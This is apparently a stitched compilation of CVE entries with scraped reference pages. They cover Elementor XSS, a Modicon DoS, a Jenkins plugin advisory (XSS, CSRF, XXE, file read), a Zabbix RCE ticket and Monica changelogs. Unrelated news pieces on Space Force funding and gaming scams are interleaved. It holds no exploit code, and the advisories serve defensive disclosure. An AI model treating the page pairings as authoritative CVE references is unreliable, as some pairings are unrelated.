An issue was discovered in the Elementor plugin through 2.9.13 for WordPress. An authenticated attacker can achieve stored XSS via the Name Your Template field.

CVE-2020-15020: Elementor Website Builder – More than Just a Page Builder

Russia's invasion of Ukraine spurs Space Force to seek astronomical investments in cybersecurity.

US Space Force top brass have requested a $700 million investment in cybersecurity as part of the military branch's overall $30 billion 2024 budget.

The Russian invasion of Ukraine and ongoing war has laid bare the national interest in defending critical networks, explained Gen. B. Chance Saltzman, chief of space operations, at a recent House Appropriations Committee hearing on Capitol Hill.

The $30 million investment in Space Force cybersecurity will "enhance the cyber defense of our critical networks associated with space operations," Saltzman said, according to reports on the hearing. "There's no question that space is going to be central to effective operations in the future."

In May 2022, Space Force added four squadrons to shore up cybersecurity throughout the branch and oversee an overhaul of the outdated Satellite Control Network.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

US Space Force Requests $700M for Cybersecurity Blast Off

An Improper Check for Unusual or Exceptional Conditions (CWE-754) vulnerability exists in Modicon Quantum 140 NOE771x1 version 6.9 and earlier, which could cause denial of service when the module receives an IP fragmented packet with a length greater than 65535 bytes. The module then requires a power cycle to recover.

Date : 09/09/2019 Type : Technical leaflet  

Languages : English Latest Version : 1.0

Reference : SEVD-2019-253-02

  

Date : 09/09/2019 Type : Technical leaflet Languages : English Latest Version : 1.0 Reference : SEVD-2019-253-02

CVE-2019-6811: Security Notification - Modicon Quantum 140 NOE771x1 | Schneider Electric

A cross-site request forgery (CSRF) vulnerability in Jenkins Proxmox Plugin 0.7.0 and earlier allows attackers to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Bitbucket Server Integration Plugin
*   Continuous Integration with Toad Edge Plugin
*   Coverage/Complexity Scatter Plot Plugin
*   Flaky Test Handler Plugin
*   instant-messaging Plugin
*   JiraTestResultReporter Plugin
*   Job and Node ownership Plugin
*   Pipeline: Phoenix AutoTest Plugin
*   Proxmox Plugin
*   Proxmox Plugin
*   Proxmox Plugin
*   RocketChat Notifier Plugin
*   SiteMonitor Plugin
*   Tests Selector Plugin

**Descriptions****Stored XSS vulnerability in Bitbucket Server Integration Plugin**

**SECURITY-2639 / CVE-2022-28133**  
**Severity (CVSS):** High  
**Affected plugin: atlassian-bitbucket-server-integration**  
**Description:**

Bitbucket Server Integration Plugin 2.0.0 through 3.1.0 (inclusive) does not limit URL schemes for callback URLs on OAuth consumers.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create BitBucket Server consumers.

Bitbucket Server Integration Plugin 3.2.0 limits allowed URL schemes to prevent creation of consumers with javascript: URL scheme.

**Missing permission checks in Bitbucket Server Integration Plugin**

**SECURITY-2640 / CVE-2022-28134**  
**Severity (CVSS):** Medium  
**Affected plugin: atlassian-bitbucket-server-integration**  
**Description:**

Bitbucket Server Integration Plugin 3.1.0 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to create, view, and delete BitBucket Server consumers.

Bitbucket Server Integration Plugin 3.2.0 requires Overall/System Read permission to view BitBucket Server consumers, and Overall/Administer permission to modify them.

**Passwords stored in plain text by instant-messaging Plugin**

**SECURITY-2161 / CVE-2022-28135**  
**Severity (CVSS):** Low  
**Affected plugin: instant-messaging**  
**Description:**

instant-messaging Plugin provides a framework for plugins integrating Jenkins with instant messaging services.

instant-messaging Plugin 1.41 and earlier stores passwords for group chats unencrypted in the global configuration file of plugins based on instant-messaging Plugin on the Jenkins controller.

These passwords can be viewed by users with access to the Jenkins controller file system.

instant-messaging Plugin 1.42 stores passwords for group chats encrypted once the integrating plugin’s configuration is saved again.

**CSRF vulnerability and missing permission check in JiraTestResultReporter Plugin**

**SECURITY-2236 / CVE-2022-28136 (CSRF), CVE-2022-28137 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: JiraTestResultReporter**  
**Description:**

JiraTestResultReporter Plugin 165.v817928553942 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

This form validation method requires POST requests and Overall/Administer permission in JiraTestResultReporter Plugin 166.v0cc6208295b5.

**CSRF vulnerability and missing permission check in RocketChat Notifier Plugin**

**SECURITY-2241 / CVE-2022-28138 (CSRF), CVE-2022-28139 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: rocketchatnotifier**  
**Description:**

RocketChat Notifier Plugin 1.4.10 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified username and password.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

RocketChat Notifier Plugin 1.5.0 requires POST requests and Overall/Administer permission for the affected form validation method.

**XXE vulnerability in Flaky Test Handler Plugin**

**SECURITY-1896 / CVE-2022-28140**  
**Severity (CVSS):** High  
**Affected plugin: flaky-test-handler**  
**Description:**

Flaky Test Handler Plugin 1.2.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers with Item/Configure permission to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

Flaky Test Handler Plugin 1.2.2 disables external entity resolution for its XML parser.

**Password stored in plain text by Proxmox Plugin**

**SECURITY-2079 / CVE-2022-28141**  
**Severity (CVSS):** Low  
**Affected plugin: proxmox**  
**Description:**

Proxmox Plugin 0.5.0 and earlier stores the Proxmox Datacenter password unencrypted in the global config.xml file on the Jenkins controller as part of its configuration.

This password can be viewed by users with access to the Jenkins controller file system.

Proxmox Plugin 0.6.0 stores the Proxmox Datacenter password encrypted once its configuration is saved again.

**SSL/TLS certificate validation globally disabled by Proxmox Plugin**

**SECURITY-2081 / CVE-2022-28142**  
**Severity (CVSS):** Medium  
**Affected plugin: proxmox**  
**Description:**

Proxmox Plugin 0.6.0 and earlier disables SSL/TLS certificate validation for the entire Jenkins controller JVM when configured to ignore SSL/TLS issues.

Proxmox Plugin 0.7.0 no longer disables SSL/TLS certificate validation for the entire Jenkins controller JVM.

**CSRF vulnerability and missing permission checks in Proxmox Plugin**

**SECURITY-2082 / CVE-2022-28143 (CSRF), CVE-2022-28144 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: proxmox**  
**Description:**

Proxmox Plugin 0.7.0 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to:

*   connect to an attacker-specified host using attacker-specified username and password, performing a connection test,
    
*   disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see SECURITY-2081 / CVE-2022-28142),
    
*   and test a rollback with attacker-specified parameters.
    

Additionally, these endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Proxmox Plugin 0.7.1 requires POST requests and Overall/Administer permission for the affected HTTP endpoints.

**XSS vulnerability in Continuous Integration with Toad Edge Plugin**

**SECURITY-1892 / CVE-2022-28145**  
**Severity (CVSS):** High  
**Affected plugin: ci-with-toad-edge**  
**Description:**

Continuous Integration with Toad Edge Plugin 2.3 and earlier uses a patched fork of an old version of the file browser for workspaces, archived artifacts, and userContent/ from Jenkins core (DirectoryBrowserSupport) to serve reports.

This fork removes the Content-Security-Policy header functionality introduced for SECURITY-95.

This results in a stored cross-site scripting (XSS) exploitable by attackers with Item/Configure permission or otherwise able to control report contents.

Continuous Integration with Toad Edge Plugin 2.4 uses the built-in Jenkins file browser to serve reports.

Some reports generated by this plugin rely on the ability to execute JavaScript. See the plugin’s documentation for a detailed explanation and options.

**Arbitrary file read vulnerability in Continuous Integration with Toad Edge Plugin**

**SECURITY-2633 / CVE-2022-28146**  
**Severity (CVSS):** Medium  
**Affected plugin: ci-with-toad-edge**  
**Description:**

Continuous Integration with Toad Edge Plugin 2.3 and earlier allows attackers with Item/Configure permission to read arbitrary files on the Jenkins controller by specifying an input folder on the Jenkins controller as a parameter to its build steps.

Continuous Integration with Toad Edge Plugin 2.4 only allows copying files from the node the build is executing on.

**Missing permission check in Continuous Integration with Toad Edge Plugin**

**SECURITY-2635 / CVE-2022-28147**  
**Severity (CVSS):** Medium  
**Affected plugin: ci-with-toad-edge**  
**Description:**

Continuous Integration with Toad Edge Plugin 2.3 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system.

Continuous Integration with Toad Edge Plugin 2.4 requires Overall/Administer permission for the affected form validation method.

**Path traversal vulnerability on Windows in Continuous Integration with Toad Edge Plugin**

**SECURITY-2654 / CVE-2022-28148**  
**Severity (CVSS):** Medium  
**Affected plugin: ci-with-toad-edge**  
**Description:**

Continuous Integration with Toad Edge Plugin 2.3 and earlier uses a patched fork of an old version of the file browser for workspaces, archived artifacts, and userContent/ from Jenkins core (DirectoryBrowserSupport) to serve reports.

The fork did not receive the fix for SECURITY-2481 in Jenkins 2.315 and LTS 2.303.2.

This results in a path traversal vulnerability allowing attackers with Item/Read permission to obtain the contents of arbitrary files on Windows controllers.

Continuous Integration with Toad Edge Plugin 2.4 uses the built-in Jenkins file browser to serve reports, inheriting the fix in Jenkins core if running on a recent enough version.

**Stored XSS vulnerability in Job and Node ownership Plugin**

**SECURITY-2285 / CVE-2022-28149**  
**Severity (CVSS):** High  
**Affected plugin: ownership**  
**Description:**

Job and Node ownership Plugin 0.13.0 and earlier does not escape the names of secondary owners.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

**CSRF vulnerability and missing permission check in Job and Node ownership Plugin**

**SECURITY-2062 (1) / CVE-2022-28150 (CSRF), CVE-2022-28151 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: ownership**  
**Description:**

Job and Node ownership Plugin 0.13.0 and earlier does not perform a permission check in several HTTP endpoints.

This allows attackers with Item/Read permission to change the owners and item-specific permissions of a job.

Additionally, this endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

This CSRF vulnerability is only exploitable in Jenkins 2.286 and earlier, LTS 2.277.1 and earlier. See the LTS upgrade guide.

**CSRF vulnerability in Job and Node ownership Plugin**

**SECURITY-2062 (2) / CVE-2022-28152**  
**Severity (CVSS):** Medium  
**Affected plugin: ownership**  
**Description:**

Job and Node ownership Plugin 0.13.0 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to restore the default ownership of a job.

**Stored XSS vulnerability in SiteMonitor Plugin**

**SECURITY-1932 / CVE-2022-28153**  
**Severity (CVSS):** High  
**Affected plugin: sitemonitor**  
**Description:**

SiteMonitor Plugin 0.6 and earlier does not escape URLs of sites to monitor in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

**XXE vulnerability in Coverage/Complexity Scatter Plot Plugin**

**SECURITY-1899 / CVE-2022-28154**  
**Severity (CVSS):** High  
**Affected plugin: covcomplplot**  
**Description:**

Coverage/Complexity Scatter Plot Plugin 1.1.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control the input files for the 'Public Coverage / Complexity Scatter Plot' post-build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Pipeline: Phoenix AutoTest Plugin**

**SECURITY-1897 / CVE-2022-28155**  
**Severity (CVSS):** High  
**Affected plugin: phoenix-autotest**  
**Description:**

Pipeline: Phoenix AutoTest Plugin 1.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control the input files for the readXml or writeXml build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**Path traversal vulnerability in Pipeline: Phoenix AutoTest Plugin allows reading arbitrary files**

**SECURITY-2683 / CVE-2022-28156**  
**Severity (CVSS):** Medium  
**Affected plugin: phoenix-autotest**  
**Description:**

Pipeline: Phoenix AutoTest Plugin 1.3 and earlier implements a Pipeline step (copy) to copy files from the running build’s directory on the Jenkins controller to an agent without sanitizing the path specified.

This allows attackers with Item/Configure permission to copy arbitrary files and directories from the Jenkins controller to the agent workspace.

**Arbitrary file read vulnerability in Pipeline: Phoenix AutoTest Plugin**

**SECURITY-2684 / CVE-2022-28157**  
**Severity (CVSS):** Medium  
**Affected plugin: phoenix-autotest**  
**Description:**

Pipeline: Phoenix AutoTest Plugin 1.3 and earlier implements a Pipeline step (ftp) to upload files to an FTP server without limiting the source directory.

This allows attackers with Item/Configure permission to upload arbitrary files from the Jenkins controller via FTP to an attacker-specified FTP server.

**Missing permission checks in Pipeline: Phoenix AutoTest Plugin allow enumerating credentials IDs**

**SECURITY-2685 / CVE-2022-28158**  
**Severity (CVSS):** Medium  
**Affected plugin: phoenix-autotest**  
**Description:**

Pipeline: Phoenix AutoTest Plugin 1.3 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

**Stored XSS vulnerability in Tests Selector Plugin**

**SECURITY-2262 / CVE-2022-28159**  
**Severity (CVSS):** High  
**Affected plugin: selected-tests-executor**  
**Description:**

Tests Selector Plugin 1.3.3 and earlier does not escape the Properties File Path option for Choosing Tests parameters.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

**Arbitrary file read vulnerability in Tests Selector Plugin**

**SECURITY-2338 / CVE-2022-28160**  
**Severity (CVSS):** Medium  
**Affected plugin: selected-tests-executor**  
**Description:**

Tests Selector Plugin 1.3.3 and earlier allows users with Item/Configure permission to read arbitrary files on the Jenkins controller using the Choosing Tests parameter.

**Severity**

*   SECURITY-1892: High
*   SECURITY-1896: High
*   SECURITY-1897: High
*   SECURITY-1899: High
*   SECURITY-1932: High
*   SECURITY-2062 (1): Medium
*   SECURITY-2062 (2): Medium
*   SECURITY-2079: Low
*   SECURITY-2081: Medium
*   SECURITY-2082: Medium
*   SECURITY-2161: Low
*   SECURITY-2236: Medium
*   SECURITY-2241: Medium
*   SECURITY-2262: High
*   SECURITY-2285: High
*   SECURITY-2338: Medium
*   SECURITY-2633: Medium
*   SECURITY-2635: Medium
*   SECURITY-2639: High
*   SECURITY-2640: Medium
*   SECURITY-2654: Medium
*   SECURITY-2683: Medium
*   SECURITY-2684: Medium
*   SECURITY-2685: Medium

**Affected Versions**

*   **Bitbucket Server Integration Plugin** up to and including 3.1.0
*   **Continuous Integration with Toad Edge Plugin** up to and including 2.3
*   **Coverage/Complexity Scatter Plot Plugin** up to and including 1.1.1
*   **Flaky Test Handler Plugin** up to and including 1.2.1
*   **instant-messaging Plugin** up to and including 1.41
*   **JiraTestResultReporter Plugin** up to and including 165.v817928553942
*   **Job and Node ownership Plugin** up to and including 0.13.0
*   **Pipeline: Phoenix AutoTest Plugin** up to and including 1.3
*   **Proxmox Plugin** up to and including 0.5.0
*   **Proxmox Plugin** up to and including 0.6.0
*   **Proxmox Plugin** up to and including 0.7.0
*   **RocketChat Notifier Plugin** up to and including 1.4.10
*   **SiteMonitor Plugin** up to and including 0.6
*   **Tests Selector Plugin** up to and including 1.3.3

**Fix**

*   **Bitbucket Server Integration Plugin** should be updated to version 3.2.0
*   **Continuous Integration with Toad Edge Plugin** should be updated to version 2.4
*   **Flaky Test Handler Plugin** should be updated to version 1.2.2
*   **instant-messaging Plugin** should be updated to version 1.42
*   **JiraTestResultReporter Plugin** should be updated to version 166.v0cc6208295b5
*   **Proxmox Plugin** should be updated to version 0.6.0
*   **Proxmox Plugin** should be updated to version 0.7.0
*   **Proxmox Plugin** should be updated to version 0.7.1
*   **RocketChat Notifier Plugin** should be updated to version 1.5.0

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Coverage/Complexity Scatter Plot Plugin
*   Job and Node ownership Plugin
*   Pipeline: Phoenix AutoTest Plugin
*   SiteMonitor Plugin
*   Tests Selector Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-1892, SECURITY-2062 (1), SECURITY-2062 (2), SECURITY-2081, SECURITY-2082, SECURITY-2683, SECURITY-2684, SECURITY-2685
*   **Daniel Beck, CloudBees, Inc. and, independently, Long Nguyen, Viettel Cyber Security, and Marc Heyries** for SECURITY-2079
*   **Jeff Thompson, CloudBees, Inc.** for SECURITY-1896, SECURITY-1897, SECURITY-1899
*   **Justin Philip** for SECURITY-2338
*   **Kevin Guerroudj** for SECURITY-2236, SECURITY-2262, SECURITY-2285
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2633, SECURITY-2635, SECURITY-2639, SECURITY-2640
*   **Marc Heyries** for SECURITY-2241
*   **Son Nguyen (@s0nnguy3n\_)** for SECURITY-2161
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1932

CVE-2022-28143: Jenkins Security Advisory 2022-03-29

In-game skins are more than just cosmetic upgrades, they’re a core part of gaming culture. Whether you’re looking…

In-game skins are more than just cosmetic upgrades, they’re a core part of **gaming culture**. Whether you’re looking to collect rare skins or show off your prized inventory, managing skins comes with risks. Scammers are everywhere, looking to trick players out of their prized items or even compromise their accounts.

That’s why it’s a must to handle your skins safely. With a few simple practices and some awareness, you can protect yourself from **gaming-related scams and malware**. Let’s break down the most common tricks scammers use and how to stay secure.

**Table of Contents Hide**

1.  Common Scams to Watch Out For
2.  1\. Stick to Trusted Platforms
3.  2\. Enable Two-Factor Authentication (2FA)
4.  3\. Double-Check Trade Links and Offers
5.  4\. Stay Alert for Phishing Attempts
6.  5\. Be Skeptical of Unrealistic Offers
7.  6\. Protect Your Account with Good Practices
8.  7\. Keep Your Devices Secure
9.  8\. Watch Out for Fake Payment Proof
10.  Final Tips

****Common Scams to Watch Out For****

Before we address safety tips, let’s look at some common scams you might witness:

*   **Phishing Links:** Fake websites that mimic legitimate platforms to steal your login credentials.

*   **Fake Middlemen:** Scammers posing as trusted intermediaries who take off with your skins.

*   **Chargeback Scams:** Fraudulent payment reversals after a transaction.

*   **Fake Trade Offers:** Seemingly legitimate offers that include different or empty items.

*   **Overpayment Scams:** Someone claims they sent too much money and requests a refund before reversing the initial payment.

*   **API Hijacking:** Attackers take control of your Steam account to initiate unauthorized trades.

****1\. Stick to Trusted Platforms****

The most important rule is to use only reliable and well-established platforms to manage your skins or other **in-game** items. These platforms ensure that both the item and the transaction are secure, reducing the risk of losing your assets.

Here are a few recommended options:

*   **Skin.Land**: Offers secure transactions with fair prices and multiple payment options.

*   **Steam Market**: Valve’s official marketplace with built-in security measures.

*   **Fortnite Shop**: The official Fortnite Shop offers authentic items and secure transactions.

*   **Epic Games Store**: Offers not just Epic Games products but third-party as well.

*   **Minecraft Marketplace**: The official Minecraft marketplace is home to everything Minecraft with guaranteed security.

Always research any third-party platform before using it to make sure it’s reputable and uses secure trade systems.

****2\. Enable Two-Factor Authentication (2FA)****

Securing your account with 2FA is a must.

*   Activate **Steam Guard Mobile Authenticator** to add security.

*   Enable two-step verification on any third-party sites you use.

This simple step significantly reduces the chances of unauthorized account access.

****3\. Double-Check Trade Links and Offers****

Watch out when clicking on trade offers or links sent through messages or DMs. Scammers often use profiles that mimic legitimate accounts.

*   Check the profile’s history and activity to ensure it’s genuine.

*   Never rush into a trade — take the time to double-check everything.

*   Verify the trade link through the official platform, not through random messages.

****4\. Stay Alert for Phishing Attempts****

One of the most common tricks is sending phishing links disguised as official trading platforms. Always inspect URLs carefully and avoid clicking on links sent by strangers.

*   Always manually type the website URL instead of clicking links.

*   Check for minor typos or unusual characters in URLs that can indicate a fake site.

****5\. Be Skeptical of Unrealistic Offers****

If a deal seems too good to be true, it probably is. Scammers often lure players by offering skins at suspiciously low prices. Always verify the current market value of the item before proceeding.

*   Stay wary of anyone pushing you to finalize a trade quickly.

*   Compare prices on reputable platforms to get a sense of what’s fair.

****6\. Protect Your Account with Good Practices****

Don’t let your account be an easy target. Here are some extra tips:

*   Avoid sharing your account information with anyone.

*   Keep your Steam profile private to reduce the chances of being targeted.

*   Regularly update your passwords and never reuse them across different sites.

****7\. Keep Your Devices Secure****

Remember that trading safely also means keeping your devices malware-free.

*   Use updated antivirus software to catch potential threats.

*   Regularly scan your system for malware that might compromise your account.

****8\. Watch Out for Fake Payment Proof****

Scammers may try to convince you they’ve made a payment by sending fake screenshots. Always make sure the funds are actually in your account before completing a trade.

****Final Tips****

*   Stick to platforms with a strong reputation.

*   Don’t trust deals that seem too good to be true.

*   Verify all links and offers before taking action.

*   Protect your Steam account with 2FA and strong passwords.

By following these simple guidelines, you can keep your skins and your account secure from scams and malware. Stay smart, stay safe, and game on!

Image by Ahmed Al-Maslamani from Pixabay.

Staying Safe with In-Game Skins: How to Avoid Scams and Malware

Zabbix Server 2.2.x and 3.0.x before 3.0.31, and 3.2 allows remote attackers to execute arbitrary code.

Log inSkip to main contentSkip to sidebar

![ZABBIX SUPPORT](https://support.zabbix.com/s/cimvho/820001/10ybuaq/_/jira-logo-scaled.png)

*   Dashboards
*   Projects
*   Issues

*   Help
    
    *   Jira Core help
    *   Keyboard Shortcuts
    *   About Jira
    *   Jira Credits
    
*   Log In

![Uploaded image for project: 'ZABBIX BUGS AND ISSUES'](https://support.zabbix.com/secure/projectavatar?pid=10000&avatarId=20377)

1.  ZABBIX BUGS AND ISSUES
2.  ZBX-17600

XMLWordPrintable

**Details**

*   **Type: **![](https://support.zabbix.com/secure/viewavatar?size=xsmall&avatarId=21772&avatarType=issuetype "Defect (Security) - Discovered security vulnerabilities in Zabbix") Defect (Security)
    
*   **Status:** Closed
    
*   **Priority: **![](https://support.zabbix.com/images/icons/priorities/blocker.svg "Blocker - Blocks development and/or testing work, production could not run.") Blocker
    
*   **Resolution:** Fixed
    
*   **Affects Version/s:** 3.0.30
    

*   **Component/s:** None
    

*   **Sprint:**
    
    Sprint 63 (Apr 2020)
    

**Description**

Fixed security vulnerability CVE-2020-11800 (remote code execution).

Thanks to FU CHUANG for discovering and reporting this vulnerability!

**Affected:**

*   **Zabbix 3.2 (end of support)**
*   **Zabbix 3.0 up to 3.0.30**
*   **Zabbix 2.2.x after 2.2.18 (end of support)**

**Fixed:**

*   **Zabbix 3.0.31**

**Not affected:**

*   **Zabbix 3.4, 4.0, 5.0**

**Attachments**

**Activity**

**People**

Votes:

0 Vote for this issue

Watchers:

6 Start watching this issue

**Dates**

Created:

2020 Apr 15 13:10

Updated:

2020 Jul 16 14:10

Resolved:

2020 Apr 20 14:48

CVE-2020-11800: [ZBX-17600] Zabbix remote code execution vulnerability (CVE-2020-11800)

A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user.

**v5.0.0-beta.3**

**5.0.0-beta.3 (2023-10-29)****Bug Fixes**

*   add doctrine/dbal (#6817) (67a3acf)
*   correct ordering of contacts based on preferred displaying of names (#6962) (a46e92b)
*   default template cant be deleted (#6911) (eef206d)
*   fix Dockerfile (#6966) (452f59f)
*   fix locale in DatePicker (#6958) (e6157e7)
*   fix quick facts not being able to be saved (#6912) (b6b78e5)
*   fix sync\_tokens id table change (#6801) (60bdd08)
*   fix syntax error (#6957) (1b351e4)
*   fix uploadcare (#6942) (e9c4f9d)

**Features**

*   add logs for addressbook subscriptions (#6841) (094916d)
*   add monica:getversion command (#6965) (cd1b699)
*   add more vcard exports (#6878) (457081c)
*   add webauthn cookie when registering a new key (#6952) (142de32)
*   download one contact as vcard (#6747) (dd27398)
*   implement DAV client subscriptions (#6751) (2286e79)
*   implement Dav for groups (#6799) (b9783c6)
*   update langs and monica:localize command. Add 3 new languages. (#6917) (2fe7abc)

**v5.0.0-beta.2**

**5.0.0-beta.2 (2023-07-08)****Features**

*   add instance administrator (#6670) (ab3f380)
*   improve telegram setup workflow (#6734) (9ee07fb)

**Bug Fixes**

*   fix AddPostToSliceOfLife (#6681) (7c45d0d)
*   fix address image show (#6672) (ec3a44d)
*   fix addresses report list (#6725) (9c86677)
*   fix basic auth with token (#6673) (fab6c32)
*   fix call reasons (#6686) (ba06e85)
*   fix contact selector (#6680) (05c1333)
*   fix empty useForm() (#6671) (06851c9)
*   fix help links (#6727) (63574d1)
*   fix important date form (#6722) (46f4713)
*   fix ModuleFamilySummaryViewHelper (#6682) (7e77bea)
*   fix sentry integration and some slight errors (#6651) (d94c4ec)
*   fix setting a locale (#6721) (ddcb6e2)
*   fix some vue errors (#6685) (00548f8)
*   fix useForm (#6724) (d356688)
*   fix vue errors (#6707) (c69297f)
*   fix vue refs targets (#6675) (133e426)
*   fix vue refs targets (again) (#6676) (7b8997c)

**v5.0.0-beta.1**

**5.0.0-beta.1 (2023-06-10)**

First pre-release of chandler.  
See https://www.monicahq.com/blog/chandler-is-in-beta

**Bug Fixes**

*   bug fix on loan (monicahq/chandler#85) (bfe5ebe)
*   fix sortByCollator collection macro return keys (monicahq/chandler#556) (c3605ba)
*   fix address pivot (monicahq/chandler#419) (59924a2)
*   fix app\_version warnings (monicahq/chandler#411) (b9e32e9)
*   fix avatar not showing on reminder list (monicahq/chandler#229) (3d9cc3b)
*   fix avatar not uploaded in tabs (5c98f0c)
*   fix avatars here and there (monicahq/chandler#180) (438782f)
*   fix batch of reminders (monicahq/chandler#402) (a23da58)
*   fix batch of scheduled reminders (monicahq/chandler#401) (6a0d603)
*   fix cities blank state (monicahq/chandler#473) (9d2d103)
*   fix contact being clickable when choosing a contact (monicahq/chandler#398) (79f8b9c), closes monicahq/chandler#395
*   fix contact information without a protocol (monicahq/chandler#347) (e53b7ac)
*   fix contacts not being displayed (monicahq/chandler#470) (f7e8101)
*   fix cron again (monicahq/chandler#403) (50c98da)
*   fix dates not being saved (monicahq/chandler#76) (5df1726)
*   fix destroy file (monicahq/chandler#488) (5234096)
*   fix documentation links (monicahq/chandler#264) (2850688)
*   fix due tasks not being displayed on dashboard (monicahq/chandler#351) (ac1a724)
*   fix edit reminder (monicahq/chandler#152) (0759d58)
*   fix emojis on windows (monicahq/chandler#483) (b8b5950)
*   fix empty div showing when no tasks on dashboard (monicahq/chandler#379) (4752f68)
*   fix errors handle (monicahq/chandler#487) (8e2d5f8)
*   fix family summary (monicahq/chandler#265) (478d574)
*   fix favicon url (monicahq/chandler#247) (7230c5d)
*   fix flash emit (monicahq/chandler#389) (03f332c)
*   fix french translation (monicahq/chandler#524) (a7e2302)
*   fix generating api doc (monicahq/chandler#360) (2e11c10)
*   fix i18n for contact selector (monicahq/chandler#489) (2324f87)
*   fix i18n plural forms (monicahq/chandler#486) (721abb9)
*   fix important date type cant be null (monicahq/chandler#397) (6e9362f), closes monicahq/chandler#377
*   fix inconsistency in wording (monicahq/chandler#485) (24786cd)
*   fix life event modal not reset upon save (monicahq/chandler#510) (c791202)
*   fix meilisearch indexes import (monicahq/chandler#378) (55b4bbb)
*   fix memcache fortrabbit integration (monicahq/chandler#372) (8bcd595)
*   fix mixin added for testing (monicahq/chandler#355) (bc6b273)
*   fix months discrimination (monicahq/chandler#560) (1c8e84e)
*   fix notifications looping when processing the batch (monicahq/chandler#392) (dd6d45f), closes monicahq/chandler#390 monicahq/chandler#391
*   fix password saving at registration (monicahq/chandler#306) (88e5502)
*   fix reminders (monicahq/chandler#154) (9227a1a)
*   fix reminders one more time (monicahq/chandler#405) (bf4a138)
*   fix scout config for groups (monicahq/chandler#374) (070503e)
*   fix scribe generate (monicahq/chandler#310) (df63469)
*   fix scribe generate on docker image (monicahq/chandler#309) (74ccb06)
*   fix search with scout database (monicahq/chandler#223) (62978fa)
*   fix setup and dummy in case meilisearch not activated (monicahq/chandler#185) (6a85bca)
*   fix signup form not working (monicahq/chandler#221) (d291bbe)
*   fix socialite integration (monicahq/chandler#554) (2fddbe1)
*   fix suffix label (\[monicahq/chandler#394\](https://github.com/...

**v4.0.0**

**4.0.0 (2023-01-30)****⚠ BREAKING CHANGES**

*   switch to php 8.1+ dependency (#6250)
*   drop php 7.4 support (#6246)

**Features**

*   add DB\_TESTING\_PORT in database config (#6201) (fefa799)
*   add disallow in robots.txt (#6268) (be2e280)
*   add name to user resource (#6174) (8465803)
*   check male translation and fall back to generic (#6039) (4ba9062)
*   drop php 7.4 support (#6246) (84d0232)
*   focus tags input box (#6392) (2d75053)
*   load more activities (#5973) (117fe19)
*   switch to php 8.1+ dependency (#6250) (6a7f49f)

**Bug Fixes**

*   allow configuring port for test database (#6236) (aeffb71), closes #6200
*   allow empty completed\_at task date (#6025) (d4504e3)
*   change APP\_TRUST\_PROXIES to APP\_TRUSTED\_PROXIES (#6095) (5f63bed)
*   Continuously pressing enter shows empty tags (#6314) (2386096), closes #6235
*   fix avatar not being loaded on dashboard (#6224) (7c8105c)
*   fix blurry modals from sweet-modal-vue (#6026) (4cc1d8f)
*   fix Journal sidebar width on mobile (#6027) (d690bf6)
*   fix laravel cloudflare proxy (#6264) (d0b50fe)
*   life event creation with unknown month/day (#6046) (d81123b)
*   only include real contacts in carddav sync (#6014) (626f078)
*   **php8.1:** deprecated trim with null value (#6374) (b4c1c03)
*   skip version check if current version is empty (#6137) (4e1e4ee)
*   typo in french translation of nephew (#6074) (ad11e01)
*   vcard bday export format with unknown year (#6087) (f0db671)

**v3.7.0**

**v3.6.1**

**v3.6.0**

**3.6.0 (2022-01-11)****Features**

*   activate Norwegian and Russian languages (#5856) (8bdccbb)
*   add contact soft delete and prunable (#5826) (6f887df)
*   add reminders/upcoming API (#5783) (a3e9b79)
